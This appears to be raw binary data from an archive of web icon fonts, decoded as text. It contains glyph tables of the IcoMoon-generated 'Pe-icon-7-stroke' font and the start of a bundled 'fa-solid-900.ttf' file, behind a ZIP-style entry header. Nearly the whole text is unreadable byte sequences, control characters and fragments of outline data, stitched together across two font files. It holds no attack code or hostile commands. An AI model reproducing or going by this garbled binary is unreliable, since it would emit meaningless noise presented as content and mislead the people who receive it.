3��2M\x�����"3267>54&'.#"&'.5467>312#?'>7>54&'.'7.'.'7'.'.#1"'>7>32'>7>7.'.5467>77.'.'7381267>7#"&'.'7'>7>7*K  K**K  K*#

##

#fA@8@
+	
I+



+



�+
@
	CA@@	*	
I,+



�*	@
	� K**K  K**K ��
##

##
�+


+

:+
@
B@@@
+
I+

+


�+
?
	CAA	?
+	
+��1dq"3267>54&'.#"&'.5467>32#"3467>323467>7>7>54&'.#"32654&#,N!!N,,N!!N,)GG))GG)							





�!N,,N!!N,,N!�gG))GG))G4
				

		
�



+��%#####5##5#1!5�UUUU���w���ff���3��
!!''!5777!3��f�qMU32x��54UMm����f�J�=x":?��="v=�������r����""&#"'>54&'.#".#"3267>54&'.'732673267>54&'.'7:3267>54&'.#"&'.5467>32#7"&'.5467>32#"&'.5467>32#"&'.5467>32#�	P
Q		V			V
P		P		��



�



�



o



�	�C
	�			�C			
�		�3
		
�				w	

	"	

	+��(1FU%4&'.'1#13267>7178175>7>5'5"&'.5467>7#7'7� K**K !N,
 "�4"�)GD'p

uh�
�+L""L+,N!&2OC�*��G)'F Ǥ'�C-#
+��*9GUdx�������':81818#"32018181267>54&'.#267>7#5=#'"&'.'>7>7#467>73#>7>7.'.'3;".'.5.'.'>7>352=3.'.#73.'.'>7>554&'.'>7>7#7.'.''.'.'>7>7>7>7.'.'>7>7,M!!M,,N!!N,	LM	^]		]M	ML]^		^&


�	

^

	
�


�!N,,N!!N,,N!	M\
\\
mM	M

M	^\
\\
mM	M

�
	
6	


��
	

6	


f����
37#773#7,a�a��q�q��ճ�<���"�uKMf%#.'.#"'&".'.#"#";3267>5<573267>732654&#"&'.5467>32#!"&'.5467>32#�$"

"$$''$�� 

 !!!! 

 �"





""
'

'
"g        3��)26Ohqv{>7>54&'.#".'.#"#!##537'3'#772#"&'.5467>3467>32#"&'.573#533#553#i			



			d�dS�
*%��

<

�

H%*
�����ų�F
	

	
��D��H@"V

3

E@H��������31��$4?#54&'.+"3!267>=4&'.#%46;232!5!"&=!#��VV��
V
�
��g��
x
d	���
	


<��
��
f$��+[0#"&'.'.'.#"35>32326?5#"&'.'.'.#"5>323267>7�+$
					
%						
&.		
					

						
	
�
������"��
%#5'!'357!3f���UD���������˛k��
'#!1'#533!���*�qq�w�����f	yqq��x��3��#5#357'737355#35#7'#35#��zz�czz��z�cz�zzc���czzzzc���zc�znzz�3��	735#73#5%35#37%35!#33����3�l~}��x�������3�~~bͼ���<��4Pi��4&'.#"3>7>5"&'.5467>32##3267>54&'.'"&'.5467>32#75#35>7>54&'.'"&'.5467>32#�	

*				��
	
					�	



�		��#



�#��		D



恁��D



^����"C%4&5'113267>54&'.'"&'.5467>7041701#��x;"";�5}}5��"�	

!;;!

	�4
		��		
4+O�q*#!5'3##"&'.5#7!533267>73x�^�]��M�

�N4�xy





yqf��fU		U��
		
�U=��7'#73!35#!�WWB4o��o�VWWB����"��E	 ��$).38!33#!5#5335!!'#35#53;#553#53#5!!5!!5�4"��"��"3��f�ffDD4wwwwww������++3��"���ggVEEV+^3"��
7P%!377'53!!''777'"3267>54&'.#"&'.5467>32#�D�PQQP�U��f�3"5'0$7/]



u3��!----!"���GBk�dbGL�$	

	V

3��
#!!'#53!33533#53#53#5w���V"��g��V�
L�w������fDVxx��x��L��V44�33��	'\!!!5!!!3#5;#5#335#"735#37>32#"&'.=#3267>54&'.#3��f���x��x��o�m!d8F




��f�MM����^�_�(H



��2@P]0"+1!*1"5#35#5>7>57>54&'.#'.546320313#"&'.=!7532032�1��
K2D�D2K
��?	2//P?2	�
K3��3K
m?
\//ooR?\
��#(3'3#!5#%7!3#33#33#33#33#�D��>"�"������33D33D33D44E33���nn�������+��%7'!5##3!3535#!!���33"DD�����X
33��44������F�z!,7<AR!"3!267>54&'.#!!5#!"&=!%5463!2!3#553#5326=4&+"3�f		�		�^��V��f��V��V"��ff3"

"

z
�


E""�����3D	

	B��	
"'##!53'#533##55'#533#�W�hhW>>��V�>>VVE�VVjVE��E%>>>�iYV��R>>���V4V��+��Xq��73#'#5'.'./'7'.'./#537>7>?'77>7>?53267>54&'.#"3#'#3735>7>77'>7>735#.'.'7'.'.'51"&'.5467>32#1

$,-!$!	
4
	!$!-,$

4



+V!<!/1#<$
V
$<#1/!<!+



�)$	

4
	!$!//!$!	
4

	$)��



"- <!
V$<$33$<$V
!< -��



3����*C\aei>54&'.#"3267>54&'.''2#"&'.5467>3"&'.5467>32#'?77'7 		%? K**K ?% 



'DD''DD'f�B�AJ+R'8,R&�		$E&+J  J+&E$6
		
�DD''DD''DUB�A�w,'S ,&R3-��3@MZ!";53267>=4&'.#+'#"&=463!2'"32654&#3"32654&##"32654&#����C#
4+�

V
�



D



�



��
DD
��
,,
�

ހ











<����%).38%35!3267>753#5"&'.=!#!5!3#5;#5'3#5�D�x;" :33�5"5�D��U�E���";8 xgg�5oo5"�MMMMff>�;n20132+!"&'.5467>?>7>327>7>35".#"3!267>54&'.#4654&'.#1*

��	
		
%
			

%="

"0q)




			

	
%
#"

03��17"3267>54&'.#"&'.5467>32#5#35#*K  K**K  K*'DD''DD'fw� K**K  K**K �wD''DD''D��+��1H"3267>54&'.#"&'.5467>32#'&"326?64'&",N!!N,,N!!N,)GG))GG)k�09��!N,,N!!N,,N!�gG))GG))G�09�+��5!333535#5!###'#5!U�ր�D*����o�*7�5��DD�U�oU�77����6Ohm!'#33267>54&'33267>54&'.#1#'37#"&'.5467>323#"&'.5467>32/!#�PCS		x			��E��
		
�				�)J:�Fx��
		

			"��

		

		^��+>��+Haz��#'0"9.+"1#"3!267>=4&'.##!"&=46;77>;232'"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32#�F)
U
(H

f


��

OU.N
�((((#

##

#







O)(���

�
.
��((((�
##

##
�



�



3����L�"&'.'.'.5467>?>32367>13>321#"3267>76&'.'.#"'"&'.'.'.7>7>?64'.'.#w0?*
		 
	
7
�	

(=+			4!	;(&@.	C

	)"%

�	+>%'9		
#
$)
Bf��	&7>ELSZaho35#73#57#";267>54&'.#+"&546;2'5#35#5#35#5#35#75#35#35#35#5#35#5#35#35#35#�������

�


�

�
�D"D"D3D3DwD"D3D>DD3""<��V��

V

���3DU3DV4E�3D3DU3DV4E��+��	!!!5!!!!!5#3#5;#5+��V��x��x��x^��E#��V�DD�x3��o����'7'''77��������	��������QT��SS;��JJ��+HHHH�JJ��3 ��
/@!3!35!!!5!3267>=4&'.+"3'46;2+"&=�fx"��V��x�||	|		|	�o��o���MM�%+��5FW#".+";201235154630213267>54&'.#46;2+"&5!+"&546;2��

�

�		�

��
�

�
�
�

�
�
��

	

"
��"

��



"

��SmKU^|��"'35##'35#01.'.#"3267>7326?3267>54&'.#'#.'.'7#7"&'.5467>32;#7'3"&'.5467>77'>32#�	* <�9$	#

#!
FN

##

#�>3@L

&O

�>�G�

$$


S"&?
#"


�4

"



"#
&{	6{6V

C		[{{[

	HG

3��0>%54&'.'54&+"!5'!575467>32267>5#3�,

,<�<+��</.<�	V	��0

0�00;1�..�1M		qOCQ;5#"#"&=46;%4&'.#54&'.+32+3267>=267>552#	��	���"
	����	
36�	�	���^#	�	#"D+��&@N\v�"3267>54&'.##>7>7'2#4&'.'>7>3#>7>73.'.'"&'.'>7>53#7.'.53,N!!N,,N!!N,ę#
�

	
4
	

`�
#d�#
�

	
4
	

`�

#�!N,,N!!N,,N!�+'#0�),,)'+0#�*'"0�),,)'*0"+>��#3.'.+'77524&'.'5�,E43����;4
YOaF;(Epp!��U0+P%&6V��!!3#5"32654&#����n�		��p�"��]�ww� ����>W%'7>7>54&'.#".'.'7'73267>77467>32#"&'.5�"L2	3
				

	3	.L"
$;! :$
��

XF+3		
	



	
		��*F220-*��	!!!!!!57!!5�4��V��g��x"D��h��U��3��g"+��*COZfrx"73267>77'>7>54&'.#"&'.5467>32##"3755467>;17#354&'.#1'132#35#'D,
+
$$
*,
D'#??##>>#M3
pf		"�3p
Df"		�^p�E'"
5446"'E��>#$>>$#>�
3pf"		p3
wf		"x�3-��!3!'37#%#'#5!�f�X4X���tt�0�33�x��ff����f<<����aA77'7'�
UTTTTU
TA
TTTTTT
U+��1=3267>54&'.#"#"&'.5467>32'77'7'iO))OO))O"H&&HH&&H�
UTTTTU
TwO))OO))O��H&&HH&&H�
TTTTTT
U��`'77'`TT0`
UT0*��19%267>54&'.#"32#"&'.5467>3'77',N""N,-M""M-(HH()GG)aUT0!N,,N""N,,N!�G)(HH()G�`
UT0��?@%7'73aTT1�`TT0*��1973267>54&'.#"!#"&'.5467>327'7*"M-,N""N,-M"�H()GG)(H�aTT1�,N!!N,,N""N,(HH()GG)aUT0��-@77'7'�`TT0�`TT0*��19%4&'.#"3267>5!467>32#"&'.577'7'�"N,-M""M-,N"�fG)(HH()G�`TT0�,N""N,,N!!N,)GG)(HH(`TT0��`77''�`TT0�aUT0*��19"3267>54&'.#"&'.5467>32#'7''-M""M-,N""N,)GG)(HH(
aUT1�"N,,N!!N,,N"�fH()GG)(H�aUT06�	y7'7'#57<54&'.#".#";5#"&'.5467>?>7>327>7>320132+3267>54&'.#�ML88�1$		
	
%oo

	
	
*

xx"

#�
LL7��7i1


%


			*


##
���	y%'75377<54&'.#".#";5#"&'.5467>?>7>327>7>320132+3267>54&'.#ALM88b0$
				

&oo

		
*



xx"



"JLL8��8�1


%


			*





"#

A�16<DLQV[`"3267>54&'.#"&'.5467>32#'!5!!5!!5#!5#!5#!5#3#53#5%3#53#5






���m���qI���J�����2222
22224

T

���8��(��"�������5'7'7577'57'wflqk�yu�^^bb�flqk�yu��^^��bb��a�"',37'#5##3#33535#5'5!!!'7!%3#53#5�u33u��v22v���$$����$$��TT�TT+<:""v;;��vT)+2T**u�	��	!&+�3#53#553#5'5##!##53'3#53#5!!7.'.'"&5467>5>76&'4"14676&'.'#0"#3581025>7>7>54&'.'5'0&'<14656&'467>73101213<54&'
uuuuSSC�������""�����m�	




e2�33��q""2TT2""����K
				
			
��%/:S#7'7'.#"723267>5<57'.'.'7/77"&'.5467>32#�50�wY4>^D4_w_KG�K0

6Y....3`50kwZ4>`E4`__L
G�sM15B.--.��q�1|73267>54&'.#"72#"&'.5467>37'#"&'.5467>77'"3>7>323.'.#5267>72:!!::!!:�4444_
(F
'* J)
#	




	#

�!::!!;;!�4444��.F(3$.
(8*K#��5Pk#935151511'#53717>7>54&'.'7>7>54&'.'7>7>54&'.'�{_`zdTTd8D



4					
	
	
	
�bLKaa�b�NNvP?v�	

	





= $$ "&(#7-32,.56/0���w73:3:130233:3:13023:3265<54&'.'.'"&5467>7>76&'<1&676&'.'.+"0.'.'&45467>7>76&'041&676&'.'.+"01#467>7>7>54&'./.'&6715061516&'&67>7>731!5'467>7>7>54&'.5/.'&4=3<1536&'467>7>739#5H
Z		
Z	


	
	
				

�
		
	

��

	


u�
			
		
		
						
			



	
	**
	
		��i�"3267>54&'.#>7>7>7>='"&#"&'>7>737>7>321#"#"&'.'7.5<1063267>7.'.51.'.#"#3210.'.5467>32�)J  J)*I  I*n
			
			
		�9		

9C&'C
�I**II**I��!



				





	

 !! 
	&&CC&&��1:%4&'.#"3267>5!467>32#"&'.5%7'735�!M+,L!!L,+M!�mF((FF((FffQ�+M!!M++M!!M+(FF((FF(
ffR��I�w1Z%4&'.#"3267>5"&'.5467>32##32+3267>54&'.#.7777�1111ɀe11e� 77 �7777�11111177G�w\g������7'.'>7>'.'.3267#.'.'.7>7>73#3534&15#.'.5#35#'7'>%.'&67>76&'&'.'&67>763#5;#5!3#5!3#5��j-



(D

N262E��3$��




33�22��33P22�OKB	

:
	

	



PgD



f

]��7<AFLQW"#33267>54&'.#"&'.'35#>7>32#5#3=#37!!#531!!!!1�









::


���
������\��~�,				

�

3C�2Cv����?�~���`����1:7267>54&'.#"32#"&'.5467>37'#3�+M!!M+,L!!L,(FF((FF(
ffQ��!M++M!!M++M!�F((FF((F��ffR��JZd%1"1#"&'.5&6777>?7'7''7''326?>327.#"'7#"&'.5467'7-�
 !

/0HG0GG/0''�!"
�0v/

��



 
0/GG0GH0/&&�

�/v0v
��.Y3:377'7'..'.'645./?117>76.7>?'1.'./#"#"&'&	z��z#",�`Y3�	

,";	,"#z��z	&�aM*�3(���>7>312#"&'./1'.'.5467>7>7>32'.#"3267>7>54&/.'.#"'.'.5467>7"
		
�
cv	��

�	
				�			���

�dv��
	�		�	
		��



����	 >S73#53#53#5.'.#"#!#5467>32#>7>?!33.'.'53e���Ɇ��	
		���S
�	���
�	
��CC.		�L�&���
		
�n��"'%5#535#3##35#53#35#'3#5#533#53GuK�LuL�L�L�L�����놆�*��*����ۇ���������''5#9373717717537#31'515�r{`?kvc~��Ud{>�Vs�r]bLKkvd�uP?zNCZ`l��.�'AZs�>7>=#3267>54&'.''53353.'.#".5"&'.5467>32#5"3267>54&'.#"&'.5467>32#�
�
77 �ST



\1111$$%

%




" AA #		)77)	w0ss0D%J�|1111�
%$$%
�



��S�%4&'.+>7>54&'.#"#*132;267>54&'>7>54&'>7>54&'>7>5#32+32+32+1#"&'.'.+5:3:3267>7>7>54632134132#�
	�			9[


�


&o
	J	


g<
�
N
�
			�&!*E��1:"3267>54&'.#"&'.5467>32#'7'35#�,L!!L,+M!!M+(FF((FF(
ffR���!M++M!!M++M!�mF((FF((FffR����%I3#54&'.#"357'57'>7>5#5'.'.5467>32m~++

T*)

Q$$2		
%%
		CC2++"�;!**"^##/1�%

%��h�����"5467>;267>7#+"189.'.#"381267>7>7>3:3:1:323812654&'.#9"&'.'.'.+"#9"&5467>323267>7>7>32#%##33535#7"3267>54&'.#"&54632#7"3267>54&'.#"&54632#\


#
%


)/
		
/)
F					2					#
		

		
#��""""�				C					


&
#	L23

32L�%0FF0%�!""				"				"0��	#(-26:!!#535#535#535#53#3#535#535#535#537'5��\C22222222
��C33333333�uuCC���`��CCSDDTDDTCC�>_�CCSDDTDDTCC�DD''N��1f�	l�7267>54&'.#"352#"&'.5467>3>54&'.#181"813267>7465'0010101'>54&'.#818101*#81'>7>71>7>783>3:1263:3263:3201201"1"#0#'>70"1"#"*#"*1"#0#**1*#"&'.'<5<5<7<1467>781>7>781813267*1'#"&'.5467>32�				

�!M+7&!L,'F%d

	T
		$A"-	8dT'D 
S
8	
		
�				C				3
+M!(	

+M!A%<	
S
<#qh=	:C&

S

h�
	

0��h��%.'.'.5467>7>76&'<#4676&'.'.+""#3:3:13023:3265<54&'!5467>7>7>54&'.'5'.'&65>5156&'&67>7>731211?''77,







	Y

Y	
	��

	
	

G,,,,,,,�	
		
		C*	
	



		*�+,,+,,,��1:73267>54&'.#"!#"&'.5467>327'5#!L,+M!!M+,L!�F((FF((F��ffR�+M!!M++M!!M+(FF((FF(
ffR��0��h��%.'.'.5467>7>76&'<#4676&'.'.+""#3:3:13023:3265<54&'!5467>7>7>54&'.'5'.'&65>5156&'&67>7>73121175##33535,







	Y

Y	
	��

	
	

CCCC�	
		
		C*	
	



		*�CCCC��	'@Yr!!3#!!'267>54&'.#"32#"&'.5467>3267>54&'.#"352#"&'.5467>3#"&54632�3++���o�!;;!";;"4444

��f���x��x��;"";;"";35555�U"��29HW735#3.'.#">7#3757>7>54&'.'5#73>7>32''7g0D'0&-2*
�:*<7;:�
	�O$)*#��=��g0(E0	
�9<6;+9�*3.&��
��
#**$������-C!!570513830292.'.#"0+81'7526324&'.'3!U��ͫUE2	(!{{4E/-

'�����@t:m
%-SS x/M
&!3$������ )6CP]jw��'.#"326764''7'77'789'#"&54632#"&54632'#"&54632#"&54632#"&54632#"&54632'#"&54632#"&54632�l��lL�mal`tlgmh�llll0T0�0U1\l��lL�lam`slglg�mllm�00�01	-��%>K�����7"3267>54&'.#"&54632#%"3267>54&'.#"&54632#7'.'.+"#333267>=33267>=354&'.'535#%>7>;2!7#"&'.=3!#"&'.=37!5467>3!2^











#	�<7			�		
7;��	�
��
	34

4�g
U
�

4



4

4



xD

D
ww
	?RQ��				�ff��'#'+7#'3'#7'353�d�d���UV�Y�WmW�Te����5xx	��ffggdddu�������1Mm"3267>54&'.#"&'.5467>32#74&'.#"3'>7>5#?'.'.5467>32�,N""N,,N""N,(HH()GG)E	
		
$�#
Y

	

�!N,,N!!N,,N!�gG))GG))G�	



		ff
	�O


	P��1Gc.'.#"'73267>?7'7>56&'#"&'.'.546?7'7>7>32�=#)�		$$	

�&!=

��		�A��M=	
	=�>#(�
##�'"=

��		�A��L>	

	=#�/T7>54&'.'.#"3#33535#5267>7'>7>32#"&'.'.5467�







EEDD
�	

		

	�6666
EDDE
�
	/0	/0Fz!&+0%#5#5##5###3335335353553##33#37#5324D�E3443E�D42�E""U""�""4##�f+��+ff+��+fg��+����+������ %'7'777''7/7''7��

�	^��]�y``*sar`=`_�
��	^��^	�yaa+r`r`�aa����Vdiw%4&'.#"33151"5467>32.'.+32675#35>7>7>7>5<515.'.5467>7#5375�"N,,N"
%
H()G


VU&	��				�33f				�,M""M,W&�&(HH(&
�
	3
W��F�
����HWp������%5#4&'.'7'.'.'5#'#3735>7>77'>7>53'#.'.'7"&'.5467>32#7.'.#5'"'>7>7#>7>73.'.573.'.'5267>77'>7>73�<
**  ++<<
** !++
>MfI	�

sJ	
{J
vIf	+fH
7H	
{	H
vHf	� ++::++ !++=<++ 
H

<�Ii
-hI	9H


|	H
tGf
,fH
8G

+�&6F535!3#!5#54&'.'>7>5#5467>7'.'.=3�,��+
	"!

	++,	

!"		�	
##
	Z#	
�	
#?ee


XX


�XX

q	ee	���?%4&'.'35>7>557'5#'.'.5467>700--�6*,8'++'�+K !::! K+(5^^5(�B6*�Q,8�."%B55B%".��	"'?'3#5;#53#553#5'7'7/7���DD�EEDi0000�1
0��EDD�DD+11�11�00��&?7.'.#"3267>54&'.'77"&'.5467>32#���	555	�)�[//..��555

���(��/../����#(AJO%'5>7>54&'.#"'77557467>32#"&'.5'5357573	
	3��w���ff#				fw33wff�h		^8�8DD�D�)�*�B				��E�KB�<3�3�����,B'!!7'5815#*1">7>31021021358=!3>7>3:7ޫ���U�{{!(	13���'
./DQt@�w:SSS-%
 �hg$3 '
M.�����(8Ng�%1'54&'.#"3267>?3'%467>325#"&/.546?357#.103267>5&4'"&'.5<59>7>7#f�
F`	
		zi4�EĀ
a��G�34		6�

kG	
`{5�DZ̀`�l}��#IJ#		.				����*/45##;267>5#'3#5+"&'.533#5;#5��3
�
3xgg��͉4>����

www�t

��s++++��1J!!77!5!5!5''5!'267>54&'.#"352#"&'.5467>3��Uxv<Y�}��w�]<xx�^				

		��f���~w3Z �VVy`3w}��				E
		
������(A%#.'.'467>7.#&"'>54&'.#".'.5467>7'3267>?33:3>3326?>764/>7>73267>=.'.#%467>32.'.5+#"&/#*'./#*/.'&4?'.'.5467>3:27>7>732'#"&'.5467>32�
		
		

				



		

		��

		

^	


	

B&
	
	^�


		








	
		

			�		

�		

	


4

			
	8	$��1j������"3267>54&'.#"&'.5467>32#7>54&'.#"'>54&'.#".'.#"75''73267>54&'73267>73267>77#"&'.5467>32'2#"&'.5467>32#"&'.5467>3'557�				
		


�			
		
		&�� ��
	
	

	
ɼ�

�

U�����F				D				<						�bc�jV		
		U|				L				3				LW�X��W�X��!?C%7'>7>54&'.#2'7%467>7735"&'.57'7Hz0
 K*'D+8C��
4z' J+'D\
8B�}0
+J D'

-iD:
� 
5})#+J D'�D:
	��U�1MQajoty"3267>54&'.#"&'.5467>32#<5<54&'.'!'#73#5467>77#<5<53#5;#5#3#5�								U
  UUU�11��					11^+Vi				E	

	s0"
)$$*	#0jkZ??�"

"�??
aUU3333
����HR\fpz����%75'.'.'7'.'./#'737>7>77'>7>774654&5'.'.'7'3"&#"#77'57''7#'239263'"&'.5467>7>7>312#7'>7>7�DD&'3
@
5'%DD&'3
@	4''333N&�"�':33N%�" 8 8
�'�@
3'&DD%'5
@
4''DD&'6
8!
�&:33N&�"�&;33D8 8 
(D�%10>7>5<1'.'.=7'77'7'��>*+=��6&%7���3333333��.((.���(%

%(�؃4344344��1Vo�"3267>54&'.#"&'.5467>32#7&#"&'.'.3267>76&''#"&'.5467>323#"&'.5467>32�+J  J+*K  K*'DD''DD'j

!!�				�



� J++J  J++J �wD''DD''D�	

	\								����Vc|�#357'7'.=>7>54&'.#"3267>54&'.'57>=354632#"&5#"&'.5467>323#5�;;##6	
	C		
G�



�				+z;):�	::	��6(

(
C0		vG);g



��				^����hm����.'.#"73267>54&'.#"'.#"3267>74&'77'.'&677'>7>327''7>32#"&'&47#"&'.5467>327'7'7� 	A	R*T

A
***+

+))�O�rBAQ*T

A63***45)
))+���
��x����)41'7'77>?357'#"&'.'.'37!.7>?�YIH
�II530)�g/0�$5��
N��Z34HH�IH0)��	$6#
N�>s��_<�Вd~Вd~��������3++3UU^+3<*3<7G^+3+"33+fx+/3<++3�+"o3+U+++DU�++U+<++*3++3++f33f"k33<^+U"33+B+33<3+++3f+3+3++ +3�+�*�*�*�*�a��r��������������.�����������������#���+����������V�E����
��~�2nJ��t��	@	j	�

�J|��
z
�r��
��.P��6N��@��Jl�V�pF��Z��j��v�� ` �!!�""�#4%�&&�&�((�(�)*4*�,|,�-N..^.�//$/\/�0t0�11>1�22F2�3L3�3�4:4t5�6J6�77�88z8�9D:0;;�;�<<l<�=�>">�?^?�?�@L@vA$ALAfA�A�B4BHB�B�CC"C|D$D�EZE�E�F�G\HH�J�K�LL�M�NNlOO�PPP�QQ<RR�SVS�UUtWXXzX�Y�Z�[2[�\V]x]�^P^�_d_�_�`�a�b6b�b�c<c�dd�ee�gZh�ii�j�k2k�l�m�m���� � 6 � V
4�	 	�	 6	 �	 	 f	
4�Pe-icon-7-strokeVersion 1.0Pe-icon-7-strokePe-icon-7-strokePe-icon-7-strokeRegularPe-icon-7-strokeFont generated by IcoMoon.PK!�S�m��flex/fonts/fa-solid-900.ttfnu&1i�
�PFFTM�,�]�GDEF*��OS/23�V`X`cmap�j�4h�gasp���glyfh��-��dhead,�d�6hheaC-$hmtx�Q��loca�8�maxpN`8 name!�-�P+post�Fa�|1.K�`O$Ps_<�۠�@۠�E�������������] @��LfGLf��PfEd�������.�T:� ���@�@ ������@��@����
����������������@�`�@@��@��@������@@�������@�`@�@����@���@@��������@���@�@��@��������@@���@��@�@������@�@@�����������������������@@��@
@
@
@�@���`�������������@@@@@��@����@����@������@`�������@���������@����@@ ��@��@����������������������������������������������� ���@������� ��@@��@@������� � ��@� �  ����������@@���������@������������ ��@�@���������������@����@��@�������@������
��
��
���@@��@��@�`@������@@�������@��@�����������@�@����@���@@@��@�����������������������@@@@�������@�������������� ������������������������@�������������������@@��������@���������������������@��h��������@�@��������@����@��@���@�@��@�����������������������@ @���������@@�����������������������@������������������ ������������@�����@�������������@���@������@�@��@������������@��������@�����@���@ ������@���@@�������������������@��@�����@��@���@�@���@���@��������@������������ �������@������ ���������@�����������@�@@��� ���� ������������������������������@�������
�
�����A�v����������>�D�N�[�^�n�|��������������������������������"�.�1�5�:�>�D�F�K�N�Y�^�e���������������������������������-�6�9�I�N�]�l�w�z�������������������������������������(�8�[�]�`�b��������������������������"�$�4�6�:�<�?�A�C�E�G�K�N�P�S�X�]�_�b�f�m�r�t�y��������������������������	������������������������������������!�0�7�<�A�D�G�J�O�Q�U�X�^�b�f�k�m�o�t�v�y�|�����������������������������������������������"�)�/�=�@�C�G�M�S�V�[�_�i�k�s�}�������������������������������������������������
�����*�/�>�J�L�P�S�c�m�y�}������������������A�Y����������!�A�H�P�^�`�p���������������������������
���� �$�0�3�7�=�@�F�J�M�P�[�`�����������������������������
���!�3�8�@�M�Q�l�q�y����������������������������������	��(�7�X�]�`�b��������������������������"�$�3�6�9�<�?�A�C�E�G�K�N�P�S�X�\�_�a�f�h�p�t�w�}������������������������������������������������������������!�.�7�;�A�D�G�J�O�Q�S�X�]�b�d�i�m�o�t�v�x�{������������������������������������������������"�(�.�;�@�C�G�M�S�V�Z�^�i�k�r�|�������������������������������������������������
�����)�/�>�J�L�P�S�c�m�y�{��������������������%$#"! 
������������������������������������������vutspgfecaVUSNMGDB40/���������������������jH0/,)&#
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�
�

~
}
u
q
o
m
k
U
J
I
H
G
E
D
C
B
A
@
?
>
:
8
7
6
5
3
1
.
,






���������������������������������������������}{tsqgfa`ZWRNCA?<720-+"!������������������������������������vmba^]TO'
�
���8�t	���
���H�T0D`������@�� �"$$�%�&H&�''X'�()\*+�,�,�-@-�.h//�0�1|1�2�3@3�4855�6<6�747p7�8�9\:(:|;;�;�<h<�=l=�>X? ?�@�ADA�B�C�DtEDE�FFXF�F�G�G�HDH�H�I,IdI�JJ`J�KKTK�K�LpL�M`M�N�OOlO�P0P�P�Q�RHR�R�S�S�T�U$U�VV�WPW�X�Y�Y�Z|Z�[[�\`\�]]�^�_,a�b8btb�c�d\ee`e�fXf�gdg�h�iDi�j�khll�mmxm�n�o8pTp�qq�r�sls�t0t�uXu�vtv�w4xy�z\{{l||�}<}p}�}�~~\~�~���4���8����t������8���4�@�$���h������� ���0�|����X���@�����t������`���@���`�`���p���<��������������������T����H���P����t�H���8���������(��� ���H�����X����\�������p��������������L��|�������X��t���t����h����������H��x�,�,�4�Ȕ���ʼ�p�̤�x�L�����|���D��Ҥ��Ԁ��֜�L�ـ�\�����,��ޘ�ߐ�t���H���D����T������l�l��T���P��p�������8���T��������L���T� ����p���@���L�����$�����,��X�|����P�x�	�	�
<
�4|�<�
�d���dd��$D$��p�xX� t!(!�#�$h%p%�%�&t'�)�**�+(+�,�-$-�.0.�/x00�0�1d1�1�2,2p33�3�4H4�4�5H5�646�7,7�8H8�99`9�:,:�;h<8<�=H=�>>�?�@@`@�ApA�B�C0C�D�E�GG�HHH�I�JLK L0L�M0M�M�N�ODP|Q(Q�R,R�SS�T(UV(WW�X�YY�Z<[h[�\l] ]�^L^�_``$aa�b�cdc�dLd�e�f<gphh�ii�j�k\k�lxm�n4oo�pPq�r�ss�t0t�u<u�vHww�w�xdypy�z�{�||}}�~���0���`���d�t�|�,�����l���l����(���l�X�������� �����H���(���`��0������4���D�����l�4���l���$���D���@������D���@���H�����d��x��4���t�X�����<�$���@�@���\�`�\���h�����<�������t�L���d�`�������������`��Ƅ�0Ȥ�4ɴ��0�p͜�t��Ϙ�P�D�Ҭ��Դ���������x�l�h����4�h����X�4�\����4����4���H���D���\���d�D��$���l���x���l� ���t�����T�������������(���x����l���|(P$�|l(��	<
L(��
p(�$������<��D0P� d!D!�"8#8$X%%�'X(�)�+h,,�.�/�0�2�3L3�4�505�6�7�8�989�:�;8;�<�=�>t?D?�@LA,B<B�CtDD�E�F�G$G�H�I KL(MPM�NlP�Q RR�S�TDU<U�V WW�X4YY|Z\Z�\\�^<^�_|`|`�a�c(de,f�hPi�jtk�l`mPn�o�p@p�q�s,s�t�vv�wpxx�y�{0|0|�~~����������D���H���0���<���h��������l���X�@���������l�������d������$�t���|����X���D���T���������4���p����`������L���0�X���H�D�����������t�`�\���d���<���d�#>%2+"&4&+"&'#"&=46;6757'&=46546;276/`B^
@


=L=]		w"  !�n	 	n��^B
##	`	00`

		

����#-6>FNV%2#!."#"&5463!2%54+"6754+"6254+"54+"354+" 2"&4264&"p		��>T>2			�@qlo���B//B/C�	 	)77)	 		�Ll�YY(�lD����/B//BA�������T\%#1"/1#"/"/#0"##"&54?&'"#"&54?454767'&5463267'&54763267'&54763267'&5463267632376327232#"/264&"6264&"#"/#"/#"/#"/#"##"&54?&'#"&54?&547'&546326767'&547632467676767461'&546326767'&46263023763272312264&"	

			





		


	

�i			�




	





	

			


��	
	
	


				
	

			"M			6
	
			

	

				
	
	
�������"/#"/"#"/"/#*##"'&54?&'#"&54?454767'&5463267'&5463267'&54763267'&5463267632376327632264&"6264&"�

	


! 





		

			 ��((vY

	


	
 
	

	


��((l�����	-%!32;5!#!"&2!546;#"3!264&+7��@�%%n�@
�@
�
�
1		`		� *��@@


��
@	


	@����@�$N"&=46;546;232++"&=#!"&=46;76;2+";7632�		@	@	@	@	@	X�"��		7/ *�
	N		xx

@	@		@	@@

@�
d
`	&

	
X����`t�"/.54?62+"/&546325462;2=462;2=462;2=462#'64/&"2?11"/&54?62k111;&
�}
&x@11111111���
 �

��

��

�H

�&0
P1111 ��!�W���$"&462'7>&#".=4627>32?>32?>20"%2+";2+";2+"'654&'54>?63232+"3"&4622"&4((�			
�<		'/
,""J/<�	
�	
�_	
�!$'l
/�	
�E��((�((B

0�
 )q


2�	
	z�	
�klQ32


,0#!

��((����7L%7654&#"#"'&54?63276;76;232+&'%3#"/#"/#"&=46g	!K��u	
TLX	
V
	7p		b�~	
[�		�	��[	EQ	7	�
���
R	�	���� )4c3+7"264&5#"/#"/%3#".5:64&#"%#"'&54?63276;76;2&/7654&#"H
@0			I	
[�`@	)		��K��u	
TLX	
V
	7�	@8�
@			 ��
R�			���[	EQ	7�v
����'/QY$"&4622"&4&2"&42"&462"&4&2"&4'+#";+#5&546;2&264&"rb2�23
 `

`&@�@pP*#@45��~FZv6;
 & �:UPp'�%����!)19LT%#"'&54?6326;2'654&#""&462"&462;+#5&547#"2"&4ƴ��'1;*#@45�
	jN��
`&@�@?
+���!'�j		
�N& �:U.(������ 767#5&1!'>;2&264&"";#";+5!ܠC���g>B4Y�0		�
�		�!��ñ=�7E/)GR!�		 		�0���)y$2"&4&2"&4++!5&546;2'264&+"&?64&"&=4&"/&"+";22?626=46264/&63				7			=
 &@�@pPJ4Y5�			

(		(
				

(		(
	�			I			Z
@&@�9VPp/)�		(
				

(		(
				

(��@�+3A%&/#!"&=&/&547%62546;2&"2642654&+"3;
��
e	@	�4&&4&0	8(@(8	��

��

